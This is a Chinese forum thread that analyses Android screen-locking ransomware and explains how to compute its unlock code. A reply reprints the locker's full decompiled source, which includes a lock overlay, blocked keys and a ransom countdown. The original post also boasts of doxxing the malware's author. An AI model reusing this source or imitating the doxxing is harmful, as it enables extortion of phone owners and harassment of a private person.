记某锁机软件探索之旅

蓦留 · 发表于 2016-6-4 21:21

本帖最后由蓦留于 2016-6-5 15:43 编辑

论坛见了个安卓锁机求助帖，这种帖子也司空见惯了，一直不能理解这种为啥有那么多人中招
明显的锁机软件嘛，还抱着侥幸贪小便宜的心态去用

PS：这种软件有一种共同特点，界面简陋至极，基本都是一个背景图，几个框有，的还有几个选项，使用时立马要root权限

好了正文

为了避免不适，看帖有不适的朋友请及时右上角

-------------------------------------------------------
1.apk解压发现asset文件夹有个ijm-x86.so，这个后缀改成apk，这个就是锁机软件咯，别问我为啥
看大神分析http://www.52pojie.cn/thread-492827-1-1.html
2.然后是反编译了，哦，没壳！新手一个，apk有壳我也不会脱

然后看看java源码咯，大神的分析论坛很多，直接上图好了

然后发现s里边就可以找到解锁码算法了

恩，就是

[Java] 纯文本查看 复制代码

    this.pass = ((Math.random() * 100000000));
    long l = this.pass + 99;
    Long localLong = new Long(l);
    this.passw = localLong;

其实其他部分也有用的，看大神文章分析吧，然后ta还有个PIN锁，密码：1314 是释放的那个app激活后才有的，当然只要不脑残，不会给这软件激活的

恩，这个基本都会，我只是给那些一点也不知道的提供下流程
如果你觉得我只是为了写这个，
那就错了，
这只是个引子

重点是我闲的蛋疼去人肉这个作者
发现了姓名手机号 QQ号微信号优酷号贴吧号...... 瞬间就震惊了，
作者你TM放这么多个人信息在网上你不怕人揍你去啊！！！
1.首先百度了下这个QQ
卧槽信息量太大有木有

百度信息量就超级大了
然后发现了这个

还有这个

其实百度信息量就超大了...具体自己探索，我就不多说了

咳咳原来你还有网站啊， whois反查信息量也蛮大的

看样子网站像是别人给建的看看其他吧
然后，进网站瞧瞧，哟，QQ 手机姓名都有啊啧啧

你说你那么多信息在网上，不怕勒索的人离你近的去揍你啊.

回帖奖励也没人回，CB收回来好了，可怜了税交过了...

纯属无聊闲的，如果违规的话麻烦管理告知下然后删帖

蓦留 · 发表于 2016-6-7 16:43

cfcanying 发表于 2016-6-7 16:37
https://yunpan.cn/cRfIJw8XFdeYt （提取码：1388）老是挂

给你代码自己看吧有点不同但差不多

[Java] 纯文本查看 复制代码

package tk.jianmo.study;

import LogCatBroadcaster;
import android.app.Activity;
import android.app.AlertDialog.Builder;
import android.app.Dialog;
import android.app.DialogFragment;
import android.content.Context;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.os.SystemClock;
import android.text.Editable;
import android.view.KeyEvent;
import android.view.View;
import android.view.Window;
import android.widget.EditText;
import android.widget.TextView;
import android.widget.Toast;
import java.util.Timer;
import java.util.TimerTask;

public class MainActivity
  extends Activity
{
  Context context;
  @Override
  Intent intent;
  int keyTouthInt = 0;
  long newTime = 0;
  int pas = (int)((Math.random() + 1) * 941214);
  int pasJ;
  int pasM = 3 * this.pas - 586782;
  int pasT = 120;
  SharedPreferences sp;
  int theBeginTimeToFinish = 86400;
  Timer timer;
  TimerTask timertask;
  int timetofinish = this.theBeginTimeToFinish;
  TextView tv_pasM;
  TextView tv_time;
  long usedTime = 0;
  
  public void exitLock(View paramView)
  {
    if (((EditText)findViewById(2131034114)).getText().toString().equals(String.valueOf(this.pas)))
    {
      Toast.makeText(this, "解锁成功！", 0).show();
      System.exit(0);
      return;
    }
    Toast.makeText(this, "密码错误！", 0).show();
  }
  
  public void keytouch(long paramLong, int paramInt1, int paramInt2)
  {
    this.newTime = System.currentTimeMillis();
    if ((this.newTime - paramLong <= 2000) && (paramInt1 == paramInt2))
    {
      this.usedTime = this.newTime;
      this.keyTouthInt = (paramInt1 + 1);
      return;
    }
    this.keyTouthInt = 0;
  }
  
  public void onAttachedToWindow()
  {
    getWindow().setType(2009);
    super.onAttachedToWindow();
  }
  
  public void onCreate(Bundle paramBundle)
  {
    LogCatBroadcaster.start(this);
    super.onCreate(paramBundle);
    requestWindowFeature(1);
    getWindow().setFlags(-2147483648, -2147483648);
    setContentView(2130903040);
    this.context = this;
    this.tv_time = ((TextView)super.findViewById(2131034112));
    this.tv_pasM = ((TextView)findViewById(2131034113));
    Intent localIntent1 = new Intent();
    this.intent = localIntent1;
    Intent localIntent2 = this.intent;
    try
    {
      Class localClass = Class.forName("tk.jianmo.study.killpoccessserve");
      localIntent2.setClass(this, localClass);
      startService(this.intent);
      this.sp = getSharedPreferences("TimeSave", 0);
      this.timetofinish = this.sp.getInt("saveTime", this.timetofinish);
      if (this.timetofinish <= 1) {
        this.timetofinish = this.theBeginTimeToFinish;
      }
      Timer localTimer = new Timer();
      this.timer = localTimer;
      TimerTask local100000001 = new TimerTask()
      {
        @Override
        public void run()
        {
          MainActivity localMainActivity = MainActivity.this;
          Runnable local100000000 = new Runnable()
          {
            @Override
            public void run()
            {
              int i = MainActivity.this.timetofinish / 3600;
              int j = MainActivity.this.timetofinish % 3600 / 60;
              int k = MainActivity.this.timetofinish % 60;
              TextView localTextView = MainActivity.this.tv_time;
              StringBuffer localStringBuffer1 = new StringBuffer();
              StringBuffer localStringBuffer2 = new StringBuffer();
              StringBuffer localStringBuffer3 = new StringBuffer();
              StringBuffer localStringBuffer4 = new StringBuffer();
              StringBuffer localStringBuffer5 = new StringBuffer();
              localTextView.setText(localStringBuffer2.append(localStringBuffer3.append(localStringBuffer4.append(localStringBuffer5.append(i).append("时").toString()).append(j).toString()).append("分").toString()).append(k).toString() + "秒后手机硬盘被破坏，手机再过一天无解。解锁就加我吧!");
              MainActivity.this.sp.edit().putInt("saveTime", MainActivity.this.timetofinish).commit();
              if (MainActivity.this.timetofinish == -1)
              {
                MainActivity.this.stopService(MainActivity.this.intent);
                System.exit(0);
              }
              MainActivity localMainActivity = MainActivity.this;
              localMainActivity.timetofinish = (-1 + localMainActivity.timetofinish);
            }
          };
          localMainActivity.runOnUiThread(local100000000);
        }
      };
      this.timertask = local100000001;
      this.timer.schedule(this.timertask, 0, 1000);
      Handler local100000002 = new Handler()
      {
        public void handleMessage(Message paramAnonymousMessage)
        {
          String str = String.valueOf(MainActivity.this.pasM);
          TextView localTextView = MainActivity.this.tv_pasM;
          StringBuffer localStringBuffer1 = new StringBuffer();
          StringBuffer localStringBuffer2 = new StringBuffer();
          StringBuffer localStringBuffer3 = new StringBuffer();
          StringBuffer localStringBuffer4 = new StringBuffer();
          localTextView.setText(localStringBuffer2.append(localStringBuffer3.append(localStringBuffer4.append("序列号每120秒一更新，凭序列找作者要解锁密码，你的序列号是：").append(str).toString()).append(",序列号更新剩余时间还有：").toString()).append(MainActivity.this.pasT).toString() + "秒！");
          super.handleMessage(paramAnonymousMessage);
        }
      };
      Runnable local100000003 = new Runnable()
      {
        private final Handler val$pasHandler;
        
        @Override
        public void run()
        {
          for (;;)
          {
            if (MainActivity.this.pasT <= 0)
            {
              MainActivity.this.pas = ((int)((Math.random() + 1) * 941214));
              MainActivity.this.pasM = (3 * MainActivity.this.pas - 586482);
              MainActivity.this.pasT = 120;
            }
            MainActivity localMainActivity = MainActivity.this;
            localMainActivity.pasT = (-1 + localMainActivity.pasT);
            Handler localHandler1 = this.val$pasHandler;
            Handler localHandler2 = this.val$pasHandler;
            int i = MainActivity.this.pasT;
            Integer localInteger = new Integer(i);
            localHandler1.sendMessage(localHandler2.obtainMessage(22, localInteger));
            long l = 1000;
            try
            {
              Thread.sleep(l);
            }
            catch (InterruptedException localInterruptedException)
            {
              localInterruptedException.printStackTrace();
              Toast.makeText(MainActivity.this, localInterruptedException.getMessage(), 0).show();
            }
          }
        }
      };
      Thread localThread = new Thread(local100000003);
      localThread.start();
      return;
    }
    catch (ClassNotFoundException localClassNotFoundException)
    {
      NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
      throw localNoClassDefFoundError;
    }
  }
  
  @Override
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
  {
    if (paramInt == 4)
    {
      Toast.makeText(this, "不要返回哦，再玩一会！", 0).show();
      if (this.keyTouthInt != 0) {
        break label208;
      }
      this.usedTime = SystemClock.currentThreadTimeMillis();
      this.keyTouthInt = 1;
      this.usedTime = System.currentTimeMillis();
    }
    for (;;)
    {
      if (paramInt == 3)
      {
        Toast.makeText(this, "HOME不管用了，手机正在休息！", 0).show();
        keytouch(this.usedTime, this.keyTouthInt, 5);
        if (this.keyTouthInt == 6)
        {
          MyDialogFragment localMyDialogFragment = new MyDialogFragment();
          localMyDialogFragment.show(getFragmentManager(), "mydialog");
        }
      }
      if (paramInt == 82)
      {
        Toast.makeText(this, "这儿没有菜单哦！", 0).show();
        keytouch(this.usedTime, this.keyTouthInt, 100);
      }
      if (paramInt == 25)
      {
        Toast.makeText(this, "不用调节音量了，我会帮你静音！", 0).show();
        keytouch(this.usedTime, this.keyTouthInt, 2);
      }
      if (paramInt == 24)
      {
        Toast.makeText(this, "音量太大会吵着别人哦！", 0).show();
        keytouch(this.usedTime, this.keyTouthInt, 3);
      }
      if (paramInt == 26) {
        Toast.makeText(this, "关机太慢了，直接扣电池吧！", 0).show();
      }
      return true;
      label208:
      if (this.keyTouthInt == 1) {
        keytouch(this.usedTime, this.keyTouthInt, 1);
      } else {
        keytouch(this.usedTime, this.keyTouthInt, 4);
      }
    }
  }
  
  class MyDialogFragment
    extends DialogFragment
  {
    public MyDialogFragment() {}
    
    @Override
    public Dialog onCreateDialog(Bundle paramBundle)
    {
      AlertDialog.Builder localBuilder = new AlertDialog.Builder(getActivity());
      EditText localEditText = new EditText(MainActivity.this.context);
      localEditText.setHint("please input the cipher!");
      localBuilder.setView(localEditText);
      localBuilder.setTitle("Choose");
      localBuilder.setMessage("I will clear all of your data!");
      DialogInterface.OnClickListener local100000004 = new DialogInterface.OnClickListener()
      {
        private final EditText val$edit;
        
        @Override
        public void onClick(DialogInterface paramAnonymousDialogInterface, int paramAnonymousInt)
        {
          if (this.val$edit.getText().toString().equals("586482"))
          {
            MainActivity.this.stopService(MainActivity.this.intent);
            System.exit(0);
          }
        }
      };
      localBuilder.setPositiveButton("Yes", local100000004);
      DialogInterface.OnClickListener local100000005 = new DialogInterface.OnClickListener()
      {
        @Override
        public void onClick(DialogInterface paramAnonymousDialogInterface, int paramAnonymousInt) {}
      };
      localBuilder.setNegativeButton("No", local100000005);
      return localBuilder.create();
    }
  }
}

蓦留 · 发表于 2016-6-7 17:34

cfcanying 发表于 2016-6-7 16:45
我就是看到了这个代码不知道怎么算序列号 +1 *941214 也错的

我也不太懂java语言，不过凭借C语言来大概理解了
展示的序列号是pasM

[Asm] 纯文本查看 复制代码

    if (((EditText)findViewById(2131034114)).getText().toString().equals(String.valueOf(this.pas)))
    {
      Toast.makeText(this, "解锁成功！", 0).show();
      System.exit(0);

根据上边这段可以知道输入的等于pas时解锁

下边这段是120秒重设序列号

[Java] 纯文本查看 复制代码

            if (MainActivity.this.pasT <= 0)
            {
              MainActivity.this.pas = ((int)((Math.random() + 1) * 941214));
              MainActivity.this.pasM = (3 * MainActivity.this.pas - 586482);
              MainActivity.this.pasT = 120;
            }

根据这段可以知道 pas=((int)((Math.random() + 1) * 941214))
而pasM= (3 * MainActivity.this.pas - 586482)

展示的序列号是pasM

所以求pas就是逆运算
pas=(pasM+586482)/3
即解锁码=（序列号+586482）/3

超越时袋 · 发表于 2016-6-4 21:25

楼主好厉害，楼主真威武

朱大海 · 发表于 2016-6-4 21:29

每天学习争取进步！

榻榻米 · 发表于 2016-6-4 21:33

这么说感觉是让作者注意安全为他想得蛮周到啊。。

ynymlpy · 发表于 2016-6-4 21:37

支持楼主！

蓦留 · 发表于 2016-6-4 21:38

榻榻米发表于 2016-6-4 21:33
这么说感觉是让作者注意安全为他想得蛮周到啊。。

不能说提醒吧，只能说这个作者一点也不担心别人现实中找到他，见过不少锁机软件勒索都用的小号，都是为了怕别人人肉，这个用大号，自然好查咯，还有刚设了回帖奖励，可以再回一贴试试运气哦

华夏小荧虫 · 发表于 2016-6-4 21:40

楼主好厉害

绝版ren物 · 发表于 2016-6-4 21:42

刚你一样我也是这么搞得，提醒小白安装软件是看清楚了，还有就是多看看论坛大神的教程

回忆不悔 · 发表于 2016-6-4 21:43

人肉技术不错

点击下载 · 发表于 2016-6-4 21:43

提示: 作者被禁止或删除内容自动屏蔽

帐号		自动登录	找回密码
密码			注册[Register]

点击下载点击下载当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	点击下载发表于 2016-6-4 21:43 提示: 作者被禁止或删除内容自动屏蔽
点击下载点击下载当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽
	回复支持举报

[Android 原创] 记某锁机软件探索之旅

点评

免费评分

回帖奖励 +1 CB吾爱币

免费评分

回帖奖励 +1 CB吾爱币

个人中心